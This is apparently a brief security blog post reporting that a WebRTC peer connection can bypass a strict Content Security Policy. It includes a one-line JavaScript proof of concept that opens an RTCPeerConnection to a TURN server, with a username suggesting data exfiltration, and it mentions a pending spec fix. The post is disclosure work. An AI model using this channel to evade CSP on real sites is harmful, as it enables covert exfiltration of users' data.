Bypassing strict CSP by abusing WebRTC

I noticed recently that there was a PR in the w3c github organisation on both the webappsec-csp and webrtc-pc specification repos adding a new webrtc-src repo. The PR in question:


Extracted POC:

var pc = new RTCPeerConnection({"iceServers":[{"urls":["turn:"],"username":"_all_your_data_belongs_to_us","credential":"."}]});

Running the POC on the latest chrome available does create a new WebRTC session as shown in chrome://webrtc-internals, but I haven't had the opportunity to turn this into a fully working POC.


With the current CSP, this WebRTC session shouldn't have been created at all. With more prodding, this can be turned into a viable attack. Thankfully, a fix will hopefully be merged into the spec and fixes can be added to the major browsers soon.